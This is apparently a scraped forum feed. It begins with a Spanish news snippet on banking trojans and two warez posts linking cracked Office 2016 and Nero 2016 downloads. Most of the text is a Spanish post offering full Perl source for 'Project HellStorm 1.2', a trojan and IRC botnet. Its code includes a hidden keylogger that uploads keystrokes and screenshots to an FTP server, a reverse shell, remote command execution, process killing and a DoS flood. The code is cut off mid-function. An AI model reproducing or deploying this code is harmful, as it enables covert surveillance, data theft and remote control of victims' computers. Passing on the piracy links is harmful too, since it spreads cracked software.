El troyano financiero moderno es extremadamente flexible y soporta una gama de funcionalidades diseñadas para facilitar transacciones fraudulentas a través de una gran variedad de servicios.
.
.

Fuente:
Juan Ranchal
muyseguridad.net

Office PRO Plus 2016 v16.0.4266.1003 RTM TechTools

$
0
0


Office PRO Plus 2016 v16.0.4266.1003 RTM TechTools
FiLE SiZE: 2.21 GB

INFORMATION

Código:

MICROSOFT Office PRO Plus 2016 v16.0.4266.1003 RTM + Activator [TechTools]
Microsoft Office 2016 is the complete, cross-platform, cross-device solution for the modern workplace, with smart tools for individuals, teams, and businesses. It can open your applications, documents anywhere, across multiple devices. Get the installed applications you know and trust - Word, Excel, PowerPoint, OneNote, Outlook, Publisher, Access. Always have the latest, full installed versions of Word, Excel, PowerPoint, OneNote, Outlook, Publisher, and Access and capture your ideas however you work best - using a keyboard, pen, or touchscreen. Microsoft Office 2016 will offer new security, compliance, and deployment features, giving organizations more control over sensitive data and IT more flexibility in deployment and management.

Microsoft expanded the Office footprint to iPad and Android tablets. Upgraded Office experiences on the Mac, the iPhone and on the web. Also have been added new apps to the Office family with Sway and Office Lens. All designed to keep your work moving, everywhere. While you've seen us focus on tuning Office for different platforms over the last year, make no mistake, Office on Windows desktop is central to our strategy.

Microsoft Office 2016 suite includes applications such as Word, Excel, PowerPoint, and Outlook. Office 2007, Office 2010, Office 365, or Office 2013 users can open documents created without any additional action. Customers using earlier versions of Office may need to download and install a compatibility pack.

New in Microsoft Office 2016:

Your documents, anywhere - Across the Office 2016 applications, it's easier to use the power of feature-rich applications to create, open, edit and save files in the cloud from your desktop, so you can access them from anywhere and on any device. In addition, new modern attachments in Outlook make it easy to attach files from OneDrive and automatically configure permission for the recipients - without leaving Outlook. All making it easier to share and collaborate on your work with others.

Collaboration - Real-time co-authoring is available in the Office Online apps today and we're bringing that experience to the Windows Desktop applications, starting with Word. When you and your team are working in Word 2016 and/or Office online, you'll be able to see where other editors are working and what they are writing - all in real-time.

Smart Applications - Applications will learn as you work, taking advantage of subtle cues and clues to help you stay on task and get more out of Office. Tell Me, a new search tool available in Word, PowerPoint, and Excel, serves up the commands you need by simply typing what you want to do. Clutter - a new Exchange feature that lights up in Outlook - uses machine learning to analyze your email patterns and de-clutter your inbox by moving lower priority messages out of your way and into a new Clutter folder. And Insights, powered by Bing, finds you contextual information from the web within the reading experience.

Data analysis made faster and easier - New analysis capabilities are built into Excel, so you can pull, map, analyze and visualize your data faster and easier than ever.

• One-click forecasting. Create forecasts on your data series with one click to future trends.
• Intuitive data connecting and shaping capabilities. With integrated Power Query, use Excel as your personal analysis workspace by connecting to and viewing all the data around you. Take advantage of a broad range of data sources, including tables from websites, corporate data like SAP Business Objects, unstructured sources like Hadoop, and services like Salesforce. After bringing all your data together in one place, quickly shape and combine to fit your unique business needs and get to analysis in seconds
• Easy data modeling and powerful analysis. With improved Power Pivot features as part of Excel, map different data sets with drag-and-drop ease to build data models to give you the bigger picture of your business. Take advantage of intuitive analysis functions, automatic time grouping and other features that enhance your PivotTable and PivotChart analysis experience. Now with the ability to calculate 100s of millions of rows of data, perform deeper analysis with high speed.
• Publish to Microsoft Power BI Preview. Effortlessly publish and share your Excel workbooks to users of Power BI.
• New modern charts and graphs, including TreeMap, Sunburst, Waterfall, Box and Whisker and Histogram and Pareto in Excel help you to present your data in fresh ways.

+----------------+
| How to use  |
+----------------+
1) Open _ReadMe.txt and read Instructions



1 LiNKS | Part 1 GB | NO CRC | NO PASS

http://rapidgator.net/file/30616e940...part1.rar.html
http://rapidgator.net/file/633948485...part2.rar.html
http://rapidgator.net/file/d6e71d382...part3.rar.html

http://uploaded.net/file/4kjqtq86/Of...ools.part1.rar
http://uploaded.net/file/v5x77fja/Of...ools.part2.rar
http://uploaded.net/file/qvhg1njj/Of...ools.part3.rar

If you like my post, don't forget to say Thanks and help keep the thread alive. Thanks You!

Nero Burning ROM 2016 17.0.00300 FINAL TechTools

$
0
0


Nero Burning ROM 2016 17.0.00300 FINAL TechTools
FiLE SiZE: 124.01 MB

INFORMATION

Código:

Nero Burning ROM 2016 17.0.00300 FINAL + Crack [TechTools]
Nero Burning ROM 2016 is a popular software package that is used to manage data, videos, audios, television content and photos. Some of the features that Nero boasts of include copying and burning ability for numerous formats which include DVD, CD, diagnostic tools, Blu-ray, DVD-9 compression, DVD-5 compression, virtual disk drives, and various audio formats. The software is developed and distributed by Nero AG. The latest version of Nero, Version 16 was released in the year 2012 and it uses the latest video formats which are of high quality and can be used in converting, editing, and burning movies. You can also stream HD movies, photos and music from the internet at a faster speed with Nero.

Why buy Nero software
In addition to the high speed streaming offered by the Nero there are other features including an improved speed of encoding with automatic detection of the GPU device accelerator which is also installed once you download Nero software, easy grouping of numerous projects targeting one device destination, extensive support for many devices including android, iOS and other mobile devices, automatic matching of music duration for slideshows, and fast output results. It also able to span data effectively across multiple DVDs, CDs and Blu-ray discs, it can burn self-starting DVDs, CDs, and Blu-ray discs, can import and export HD videos and can enhance videos with slow and fast effects.

Everything in one place
Downloading Nero software will enable you to enjoy watching you movies, photos, music and other videos in the formats of your own choice and from the comfort of your home. Nero is available with other applications from Nero in addition to the many video effects, templates and themes that give you an opportunity to master your media. All these amazing features are integrated together in a package that is off a high performance and gives you the results you want. It is even simpler to stream slideshows, playlists and photo albums to the devices you have in your home.

Burn and Backup
With Nero Burning ROM 2016 one can safely store all the important data without having to worry about losing the information. One is ably to burn DVDs, CDs, and Blu-ray discs of high quality which can be used in the storage of such important data. This new version of Nero software has the option of a password for content you deem sensitive. This will help you prevent anyone who wants to pry into your files. Another outstanding feature about the backup system of Nero is that it is done automatically so you do not have to keep reminding yourself to do the backup. Finally there in the restore and recover option which gets you back any damaged data from the hard drives and flash memory of your computer.

Editing and Improving
One can also make high quality videos from the more than 500 themes and effects that come with the software. To make thing even better, the themes and effects are user-friendly are therefore easy to understand and use. You can create Blu-ray discs, DVD video discs, and AVCHDs that are of Hollywood quality complete with texts and graphics, on screen navigations and menus. One can also export the movies to some of the best file formats available. Such formats can be uploaded directly to the internet where other people can enjoy the quality of the movies or songs.

Rip and Convert
With the Nero Burning ROM one has to ability to optimize videos so that they can be watched on many types of devices such as PSP, XBOX 360, Play Station 3, Play station Vita, Kindle fire, Android Smartphones, iPods and iPhones among many others. Non commercial Blu-ray discs, DVD videos and AVCHDs can also be converted to any kind of video and audio formats. One also cannot miss out on the DVD video playback menu which is available when Nero is used on Windows 8. In addition one gets the opportunity to enjoy various video files, and songs on the personal computer using just one player.

In conclusion, Nero Burning ROM relieves people from the hassle they normally have to keep up with whenever they stream movies, music files and photo slideshows from the comfort of their homes. All this is done on one player so there is absolutely no need to download other players so that one is able to watch and play all the formats of videos and audio music. For one to be able to download and install Nero, they need to have windows XP, windows Vista, Windows 7 or Windows 8 processors, and a DVD-ROM in order to enjoy the services that are provided by the software.

Nero Burning ROM 2016 Features:
• Integrated Nero MediaBrowser - One-stop access from your library to your project.
• Create photo books - Delivered from your PC to your door.
• Convert DVD-Video* and video files.
• Import Windows Live Movie Maker projects.
• Easy and Advanced Video Editing Modes - Go from Easy to Advanced with a click.
• Nero LIVEBackup - 24-7 Peace-of-mind backup.
• Burn long lasting discs - Create discs that last and last.
• Ripping of DVDs - DVD-Videos ripped with just a click.

Burn high quality, reliable and secure discs:
• Burn high quality and secure CDs, DVDs, and Blu-ray Discs
• Burn your favorite music onto CDs and DVDs for easy listening in your car or any CD/DVD player
• Copy CDs and DVDs including the CD text for easy CD cover printing
• Span large data over several discs in the most efficient way
• Protect your discs and ensure your privacy with Nero's burn technology and password protection

Create with confidence and ease for pro-like results:
• Create high-quality video projects on DVDs and Blu-ray Discs with pro-style menus
• User-friendly, high-impact video editing in Express or Advanced Editing mode
• Compose amazing, customized slideshows with special effects, personal titles, backgrounds, and more
• Hundreds of easy-to-use video effects, picture-in-picture effect generator, and key framing
• Share the magic by creating high quality printed photo books, calendars, and post cards

Play all your photos, videos and music from one central location:
• Stream playlists and enhanced slideshows with ease
• Play all your music playlists with one media player that integrates Windows Media Player and iTunes.
• Play virtually any file, playlist, or disc from one simple to use application
• Prep your favorite TV shows, movies, and photos for optimal viewing on your smartphone or tablet
• Easily stream movies, photos, and music to your streaming enabled devices like TVs, Blu-ray players and Hi-Fi systems

Convert virtually any format to be played on any device:
• Effortlessly transcode and send your video and audio disc contents to any connected device or cloud
• Easy and fast converting of AVCHD, DVD-Video, Audio-CDs, video, and audio files to virtually any device
• Support for Android, iOS, Windows 8 smartphones, and tablets - latest and greatest profiles included
• Import files from your mobile device, PC, or web video sites and burn them to discs

Manage your photos, videos and music with ease:
• NEW: Fast, guided access to applications, projects, tools, and tutorials
• Find and sort files by dates, people, events and keywords
• Easily edit and improve your photos and videos
• Use Nero MediaHome library with any of your Windows applications
• Face recognition for fast access to the photos needed to create photo books and slideshows

+----------------+
| How to use  |
+----------------+
1) Open _ReadMe.txt and read Instructions



1 LiNKS | Part 1 GB | NO CRC | NO PASS

http://rapidgator.net/file/d8cfdeffa...Tools.rar.html

http://uploaded.net/file/tz5l44y7/Ne..._TechTools.rar

If you like my post, don't forget to say Thanks and help keep the thread alive. Thanks You!

[Perl] Project HellStorm 1.2

$
0
0
Hola hoy les traigo un troyano en Perl que funciona mediante sockets y como IRC Botnet , tiene las siguientes opciones :

[++] Opciones del troyano

[+] Navegador de archivos : borrar,renombrar
[+] Da informacion sobre la computadora
[+] Abrir y cerrar CD
[+] Ocultar y mostrar barra de inicio o iconos del escritorio
[+] Hacer hablar a la computadora para que diga lo que queramos
[+] Mandar mensajitos
[+] Consola de comandos
[+] Administracion de procesos
[+] ReverseShell
[+] Cambiar fondo de escritorio
[+] Mover mouse
[+] Cargar word para que escriba solo
[+] DOS Attack : en el caso de IRC podran hacer un ataque DDOS si tienen varios infectados
[+] Keylogger en segundo plano : sube logs y fotos tomadas a un servidor FTP

Una imagen :



Los codigos :

server.pl

Código:

#!usr/bin/perl
#Project HellStorm 1.2
#(C) Doddy Hackman 2015
#Necessary modules
#
#ppm install http://www.bribes.org/perl/ppm/Win32-API.ppd
#ppm install http://www.bribes.org/perl/ppm/Win32-GuiTest.ppd
#
#Use "perl2exe -gui server.pl" to hide console
#

use Win32::OLE;
use Win32::OLE qw(in);
use Win32::Process;
use Win32;
use Win32::API;
use Win32::GuiTest
  qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
use Win32::Clipboard;
use threads;
use Net::FTP;
use Win32::File;
use Cwd;
use IO::Socket;
use Win32::Job;
use Win32::GuiTest qw(MouseMoveAbsPix SendMessage);

if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

# FTP Configuration

my $host_ftp = "localhost";    # Edit
my $user_ftp = "doddy";        # Edit
my $pass_ftp = "123";          # Edit

# IRC Configuration

my $host_irc  = "localhost";    # Edit
my $canal_irc = "#locos";      # Edit
my $port_irc  = "6667";        # Edit
my $nick_irc  = dameip();      # Edit

# Threads

# You must comment on the thread that you will not use

my $comando4 = threads->new( \&conexion_directa );

#my $comando5 = threads->new( \&keylogger );
#my $comando6 = threads->new(\&ircnow);

$comando4->join();

#$comando5->join();

#$comando6->join();

#

sub ircnow {

    my $soquete = new IO::Socket::INET(
        PeerAddr => $host_irc,
        PeerPort => $port_irc,
        Proto    => "tcp"
    );

    print $soquete "NICK $nick_irc\r\n";
    print $soquete "USER $nick_irc 1 1 1 1\r\n";
    print $soquete "JOIN $canal_irc\r\n";

    while ( my $logar = <$soquete> ) {
        print "\r\n";
        chomp($logar);

        if ( $logar =~ /^PING(.*)$/i ) {
            print $soquete "PONG $1\r\n";
        }

        if ( $logar =~ /:$nick_irc help/g ) {

            my @commands = (
                "msgbox <>",            "getinfo",
                "cmd <>",              "dir",
                "cd <>",                "del <>",
                "rename :<>:<>:",      "cwd",
                "verlogs",              "word :<>:",
                "crazymouse",          "cambiarfondo :<>:",
                "opencd",              "closedcd",
                "dosattack :<>:<>:<>:", "speak :<>:",
                "iniciochau",          "iniciovuelve",
                "iconochau",            "iconovuelve",
                "backshell :<>:<>:",    "procesos",
                "cerrarproceso  :<>:<>:"
            );

            print $soquete
              "PRIVMSG $canal_irc : HellStorm (C) 2011 Doddy Hackman\r\n";
            print $soquete "PRIVMSG $canal_irc : Commands : \r\n";
            for (@commands) {
                print $soquete "PRIVMSG $canal_irc : " . $_ . "\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc msgbox (.*)/g ) {
            my $msg = $1;
            chomp $msg;
            cheats( "mensaje", $msg );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc getinfo/g ) {
            my $re = getinfo();
            if ( $re =~ /:(.*):(.*):(.*):(.*):(.*):/ ) {
                print $soquete "PRIVMSG $canal_irc : [+] Domain : $1\r\n";
                print $soquete "PRIVMSG $canal_irc : [+] Chip : $2\r\n";
                print $soquete "PRIVMSG $canal_irc : [+] Version : $3\r\n";
                print $soquete "PRIVMSG $canal_irc : [+] Username : $4\r\n";
                print $soquete "PRIVMSG $canal_irc : [+] OS : $5\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc cmd (.*)/ ) {
            my $cmda = $1;
            chomp $cmda;
            my @re = cmd($cmda);
            for (@re) {
                print $soquete "PRIVMSG $canal_irc : $_\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc dir/ ) {
            my @files = navegador("listar");
            for (@files) {
                if ( -f $_ ) {
                    print $soquete "PRIVMSG $canal_irc : [File] : " . $_
                      . "\r\n";
                }
                else {
                    print $soquete "PRIVMSG $canal_irc : [Directory] : " . $_
                      . "\r\n";
                }
            }
        }

        if ( $logar =~ /:$nick_irc cd (.*)/ ) {
            my $di = $1;
            chomp $di;
            if ( navegador( "cd", $di ) ) {
                print $soquete "PRIVMSG $canal_irc : [+] Directory Changed\r\n";
            }
            else {
                print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc del (.*)/ ) {
            my $file = $1;
            chomp $file;
            if ( navegador( "borrar", $1 ) ) {
                print $soquete "PRIVMSG $canal_irc : [+] File deleted\r\n";
            }
            else {
                print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc rename :(.*):(.*):/ ) {
            my ( $a, $b ) = ( $1, $2 );
            if ( navegador( "rename", $a, $b ) ) {
                print $soquete "PRIVMSG $canal_irc : [+] Changed\r\n";
            }
            else {
                print $soquete "PRIVMSG $canal_irc : [-] Error\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc cwd/ ) {
            print $soquete "PRIVMSG $canal_irc : [+] Directory : "
              . getcwd() . "\r\n";
        }

        if ( $logar =~ /:$nick_irc verlogs/ ) {
            print $soquete "PRIVMSG $canal_irc : [+] Logs\r\n";
            my @word = openfilex("logs.txt");
            for (@word) {
                sleep 3;
                print $soquete "PRIVMSG $canal_irc : " . $_ . "\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc word :(.*):/ig ) {
            my $msg = $1;
            cheats( "word", $msg );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc crazymouse/ig ) {
            cheats("crazymouse");
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc cambiarfondo :(.*):/ig ) {
            my $url = $1;
            chomp $url;
            cheats( "cambiarfondo", $url );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc opencd/ig ) {
            cheats( "cd", "1" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc closedcd/ig ) {
            cheats( "cd", "0" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /dosattack :(.*):(.*):(.*):/ ) {
            my ( $i, $p, $t ) = ( $1, $2, $3 );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
            dosattack( $i, $p, $t );
        }

        if ( $logar =~ /:$nick_irc speak :(.*):/ig ) {
            my $t = $1;
            chomp $t;
            cheats( "speak", $t );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc iniciochau/ ) {
            cheats( "inicio", "1" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc iniciovuelve/ ) {
            cheats( "inicio", "0" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc iconochau/ ) {
            cheats( "iconos", "1" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc iconovuelve/ ) {
            cheats( "iconos", "0" );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc backshell :(.*):(.*):/ig ) {
            backshell( $1, $2 );
            print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
        }

        if ( $logar =~ /:$nick_irc procesos/ ) {

            my %vida = adminprocess("listar");
            print $soquete "PRIVMSG $canal_irc : [+] Process Found : "
              . int( keys %vida ) . "\r\n";
            for my $data ( keys %vida ) {
                print $soquete "PRIVMSG $canal_irc : [+] Process : "
                  . $data
                  . " [+] PID : "
                  . $vida{$data} . "\r\n";
            }
        }

        if ( $logar =~ /:$nick_irc cerrarproceso :(.*):(.*):/ ) {
            my ( $b, $a ) = ( $1, $2 );
            if ( adminprocess( "cerrar", $a, $b ) ) {
                print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
            }
        }

    }
}

sub conexion_directa {

    my $sock = IO::Socket::INET->new(
        LocalPort => 666,
        Listen    => 10,
        Proto    => 'tcp',
        Reuse    => 1
    );

    while ( my $con = $sock->accept ) {
        $resultado = <$con>;

        if ( $resultado =~ /msgbox (.*)/ig ) {
            my $msg = $1;
            cheats( "mensaje", $msg );
        }

        if ( $resultado =~ /infor/ig ) {
            print $con getinfo();
        }

        if ( $resultado =~ /word :(.*):/ig ) {
            my $msg = $1;
            cheats( "word", $msg );
        }

        if ( $resultado =~ /crazymouse/ig ) {
            cheats("crazymouse");
        }

        if ( $resultado =~ /cambiarfondo (.*)/ig ) {
            my $url = $1;
            cheats( "cambiarfondo", $url );
        }

        if ( $resultado =~ /opencd/ig ) {
            cheats( "cd", "1" );
        }

        if ( $resultado =~ /closedcd/ig ) {
            cheats( "cd", "0" );
        }

        if ( $resultado =~ /dosattack :(.*):(.*):(.*):/ ) {
            my ( $i, $p, $t ) = ( $1, $2, $3 );
            dosattack( $i, $p, $t );
        }

        if ( $resultado =~ /speak :(.*):/ig ) {
            my $t = $1;
            cheats( "speak", $t );
        }

        if ( $resultado =~ /iniciochau/ ) {
            cheats( "inicio", "1" );
        }
        if ( $resultado =~ /iniciovuelve/ ) {
            cheats( "inicio", "0" );
        }

        if ( $resultado =~ /iconochau/ ) {
            cheats( "iconos", "1" );
        }
        if ( $resultado =~ /iconovuelve/ ) {
            cheats( "iconos", "0" );
        }

        if ( $resultado =~ /backshell :(.*):(.*):/ig ) {
            backshell( $1, $2 );
        }

        if ( $resultado =~ /comando :(.*):/ig ) {
            my $cmd = $1;
            my @re  = cmd($cmd);
            print $con @re;
        }

        if ( $resultado =~ /mostrarpro/ ) {

            my %vida = adminprocess("listar");

            for my $data ( keys %vida ) {
                print $con "PROXEC" . $data . "PROXEC\r\n";
                print $con "PIDX" . $vida{$data} . "PIDX\r\n";
            }

        }

        if ( $resultado =~ /chauproce K0BRA(.*)K0BRA(.*)K0BRA/ ) {
            my ( $b, $a ) = ( $1, $2 );
            if ( adminprocess( "cerrar", $a, $b ) ) {
                print $con "ok";
            }
        }

        if ( $resultado =~ /chdirnow K0BRA(.*)K0BRA/ ) {
            my $di = $1;
            if ( navegador( "cd", $di ) ) {
                print $con "ok";
            }
        }
        if ( $resultado =~ /borrarfile K0BRA(.*)K0BRA/ ) {
            if ( navegador( "borrar", $1 ) ) {
                print $con "ok";
            }
        }
        if ( $resultado =~ /borrardir K0BRA(.*)K0BRA/ ) {
            if ( navegador( "borrar", $1 ) ) {
                print $con "ok";
            }
        }
        if ( $resultado =~ /rename :(.*):(.*):/ ) {
            my ( $a, $b ) = ( $1, $2 );
            if ( navegador( "rename", $a, $b ) ) {
                print $con "ok";
            }
        }

        if ( $resultado =~ /getcwd/ ) {
            print $con getcwd();
        }

        if ( $resultado =~ /verlogs/ ) {
            print $con openfile("logs.txt");
        }

        if ( $resultado =~ /dirnow ACATOY(.*)ACATOY/ ) {
            my @files = navegador("listar");
            for (@files) {
                if ( -f $_ ) {
                    print $con "FILEX" . $_ . "FILEX" . "\r\n";
                }
                else {
                    print $con "DIREX" . $_ . "DIREX" . "\r\n";
                }
            }
        }
    }
}

sub keylogger {

    my $come = new Win32::API( "user32", "GetAsyncKeyState", "N", "I" );
    my $tengo = 0;

    hideit( $0, "hide" );

    my $comando1 = threads->new( \&capture_windows );
    my $comando2 = threads->new( \&capture_keys );
    my $comando3 = threads->new( \&capture_screen );

    $comando1->join();
    $comando2->join();
    $comando3->join();

    sub capture_windows {

        while (1) {

            my $win1 = GetForegroundWindow();
            my $win2 = GetForegroundWindow();

            if ( $win1 != $win2 ) {
                my $nombre = GetWindowText($win1);
                chomp($nombre);
                if ( $nombre ne "" ) {
                    savefile( "logs.txt", "\n\n[" . $nombre . "]\n\n" );
                }
            }
        }
        return 1;
    }

    sub capture_keys {

        while (1) {

            my $test1;
            my $test2;

            for my $num ( 0x30 .. 0x39 ) {

                if ( dame($num) ) {
                    savefile( "logs.txt", chr($num) );
                }
            }

            if ( dame(0x14) ) {
                $test1 = 1;
                $tengo++;
            }

            for my $num ( 0x41 .. 0x5A ) {

                if ( dame($num) ) {

                    if ( dame(0x20) ) {
                        savefile( "logs.txt", " " );
                    }

                    if ( dame(0x32) ) {
                        savefile( "logs.txt", "\n[enter]\n\n" );
                    }

                    unless ( verpar($tengo) eq 1 ) {
                        savefile( "logs.txt", chr($num) );
                    }

                    if ( dame(0x10) or dame(0xA0) or dame(0xA1) ) {
                        $test2 = 1;
                    }

                    unless ( $test1 eq 1 or $test2 eq 1 ) {
                        if ( $num >= 0x41 ) {
                            if ( $num <= 0x5A ) {
                                if ( verpar($tengo) eq 1 ) {
                                    savefile( "logs.txt", chr( $num + 32 ) );
                                }
                            }
                        }
                    }
                }
            }
        }
        return 1;
    }

    sub capture_screen {

        $numero = 0;

        while (1) {

            sleep 120;

            subirftp( "logs.txt", "logs.txt" );

            $numero++;

            SendKeys("%{PRTSCR}");

            my $a = Win32::Clipboard::GetBitmap();

            open( FOTO, ">" . $numero . ".bmp" );
            binmode(FOTO);
            print FOTO $a;
            close FOTO;

            hideit( $numero . ".bmp", "hide" );
            subirftp( $numero . ".bmp", $numero . ".bmp" );
        }
    }

    sub dame {
        return ( $come->Call(@_) & 1 );
    }

    sub savefile {

        open( SAVE, ">>" . $_[0] );
        print SAVE $_[1];
        close SAVE;

        hideit( $_[0], "hide" );

    }

    sub hideit {
        if ( $_[1] eq "show" ) {
            Win32::File::SetAttributes( $_[0], NORMAL );
        }
        elsif ( $_[1] eq "hide" ) {
            Win32::File::SetAttributes( $_[0], HIDDEN );
        }
        else {
            print "error\n";
        }
    }

    sub subirftp {

        if ( $ser = Net::FTP->new($host_ftp) ) {
            if ( $ser->login( $user_ftp, $pass_ftp ) ) {
                $ser->mkdir( getmyip() );
                $ser->binary();
                if (
                    $ser->put(
                        getcwd() . "/" . $_[0], getmyip() . "/" . $_[1]
                    )
                  )
                {
                    return true;
                }
            }
            $ser->close;
        }
    }

    sub verpar {
        return ( $_[0] % 2 == 0 ) ? "1" : "2";
    }

    sub getmyip {
        my $get = gethostbyname("");
        return inet_ntoa($get);
    }

}

sub getinfo {
    return
        ":"
      . Win32::DomainName() . ":"
      . Win32::GetChipName() . ":"
      . Win32::GetOSVersion() . ":"
      . Win32::LoginName() . ":"
      . Win32::GetOSName() . ":";
}

sub cheats {

    my $as = new Win32::API( 'user32', 'FindWindow', 'PP', 'N' );
    my $b  = new Win32::API( 'user32', 'ShowWindow', 'NN', 'N' );

    if ( $_[0] eq "cambiarfondo" ) {
        my $file = $_[1];
        my $as =
          new Win32::API( "user32", "SystemParametersInfo", [ L, L, P, L ], L );
        $as->Call( 20, 0, $file, 0 );
    }

    if ( $_[0] eq "speak" ) {
        my $texta  = $_[1];
        my $hablax = Win32::OLE->new("SAPI.SpVoice");
        $hablax->Speak( $texta, 0 );
    }

    if ( $_[0] eq "crazymouse" ) {
        for my $number ( 1 .. 666 ) {
            MouseMoveAbsPix( $number, $number );
        }
    }

    if ( $_[0] eq "word" ) {
        my $text = $_[1];
        system("start winword.exe");
        sleep 4;
        SendKeys($text);
    }

    if ( $_[0] eq "cd" ) {

        my $ventana = Win32::API->new( "winmm", "mciSendString", "PPNN", "N" );
        my $rta = ' ' x 127;
        if ( $_[1] eq "1" ) {
            $ventana->Call( 'set CDAudio door open', $rta, 127, 0 );
        }
        else {
            $ventana->Call( 'set CDAudio door closed', $rta, 127, 0 );
        }
    }

    if ( $_[0] eq "inicio" ) {

        if ( $_[1] eq "1" ) {
            $handlex = $as->Call( "Shell_TrayWnd", 0 );
            $b->Call( $handlex, 0 );
        }
        else {
            $handlex = $as->Call( "Shell_TrayWnd", 0 );
            $b->Call( $handlex, 1 );
        }

    }

    if ( $_[0] eq "iconos" ) {

        if ( $_[1] eq "1" ) {

            $handle = $as->Call( 0, "Program Manager" );
            $b->Call( $handle, 0 );
        }
        else {
            $handle = $as->Call( 0, "Program Manager" );
            $b->Call( $handle, 1 );
        }
    }

    if ( $_[0] eq "mensaje" ) {
        if ( $_[1] ne "" ) {
            my $msg = $_[1];
            chomp $msg;
            Win32::MsgBox( $msg, 0, "Mensaje de Dios" );
        }
    }
}

sub backshell {

    my ( $ip, $port ) = ( $_[0], $_[1] );

    $ip =~ s/(\s)+$//;
    $port =~ s/(\s)+$//;

    conectar( $ip, $port );
    tipo();

    sub conectar {
        socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp') );
        connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
        open( STDIN,  ">&REVERSE" );
        open( STDOUT, ">&REVERSE" );
        open( STDERR, ">&REVERSE" );
    }

    sub tipo {
        print "\n[*] Reverse Shell Starting...\n\n";
        if ( $^O =~ /Win32/ig ) {
            infowin();
            system("cmd.exe");
        }
        else {
            infolinux();
            system("export TERM=xterm;exec sh -i");
        }
    }

    sub infowin {
        print "[+] Domain Name : " . Win32::DomainName() . "\n";
        print "[+] OS Version : " . Win32::GetOSName() . "\n";
        print "[+] Username : " . Win32::LoginName() . "\n\n\n";
    }

    sub infolinux {
        print "[+] System information\n\n";
        system("uname -a");
        print "\n\n";
    }
}

sub cmd {

    my $job = Win32::Job->new;
    $job->spawn(
        "cmd",
        qq{cmd /C $_[0]},
        {
            no_window => "true",
            stdout    => "logx.txt",
            stderr    => "logx.txt"
        }
    );
    $ok = $job->run("30");
    open( F, "logx.txt" );
    @words = <F>;
    close F;
    unlink("logx.txt");
    return @words;
}

sub adminprocess {

    if ( $_[0] eq "listar" ) {
        my %procesos;

        my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
        my $dos = $uno->ConnectServer( "", "root\\cimv2" );

        foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
            $procesos{ $pro->{Caption} } = $pro->{ProcessId};
        }
        return %procesos;
    }

    if ( $_[0] eq "cerrar" ) {

        my ( $numb, $pid ) = ( $_[1], $_[2] );

        if ( Win32::Process::KillProcess( $pid, $numb ) ) {
            return true;
        }
        else {
            return false;
        }
    }
}

sub navegador {

    my $dir = $_[1];

    chomp $dir;

    $dir =~ s/(\s)+$//;

    if ( $_[0] eq "borrar" ) {
        if ( -f $_[1] ) {
            if ( unlink( getcwd() . "/" . $_[1] ) ) {
                return true;
            }
            else {
                return false;
            }
        }
        else {
            if ( rmdir( getcwd() . "/" . $_[1] ) ) {
                return true;
            }
            else {
                return false;
            }
        }
    }
    if ( $_[0] eq "cd" ) {
        if ( chdir $dir ) {
            return true;
        }
        else {
            return false;
        }
    }
    if ( $_[0] eq "rename" ) {
        if ( rename( getcwd() . "/" . $_[1], getcwd() . "/" . $_[2] ) ) {
            return true;
        }
        else {
            return false;
        }
    }
    if ( $_[0] eq "listar" ) {
        my @archivos = coleccionar( getcwd() );
        my @all;
        for my $test (@archivos) {
            push( @all, $test );
        }
        return @all;
    }

    sub coleccionar {
        opendir DIR, $_[0];
        my @archivos = readdir DIR;
        close DIR;
        return @archivos;
    }
}

sub dosattack {
    for ( 1 .. $_[2] ) {
        IO::Socket::INET->new(
            PeerAddr => $_[0],
            PeerPort => $_[1],
            Proto    => "tcp"
        );
    }
}

sub openfile {
    my $r;
    open( FILE, $_[0] );
    @wor = <FILE>;
    close FILE;
    for (@wor) {
        $r .= $_;
    }
    return $r;
}

sub openfilex {
    my @wor;
    open( FILE, $_[0] );
    @wor = <FILE>;
    close FILE;
    return @wor;
}

sub encriptar {

    my ( $text, $op ) = @_;

    my @re;
    my @va = split( "", $text );

    my %valor = (
        "1" => "a",
        "2" => "b",
        "3" => "c",
        "4" => "d",
        "5" => "e",
        "6" => "f",
        "7" => "g",
        "8" => "h",
        "9" => "i",
        "0" => "j",
        "." => "k"
    );

    if ( $op eq "encode" ) {
        for my $letra (@va) {
            for my $data ( keys %valor ) {
                if ( $data eq $letra ) {
                    $letra =~ s/$data/$valor{$data}/g;
                    push( @re, $letra );
                }
            }
        }
    }
    if ( $op eq "decode" ) {
        for my $letra (@va) {
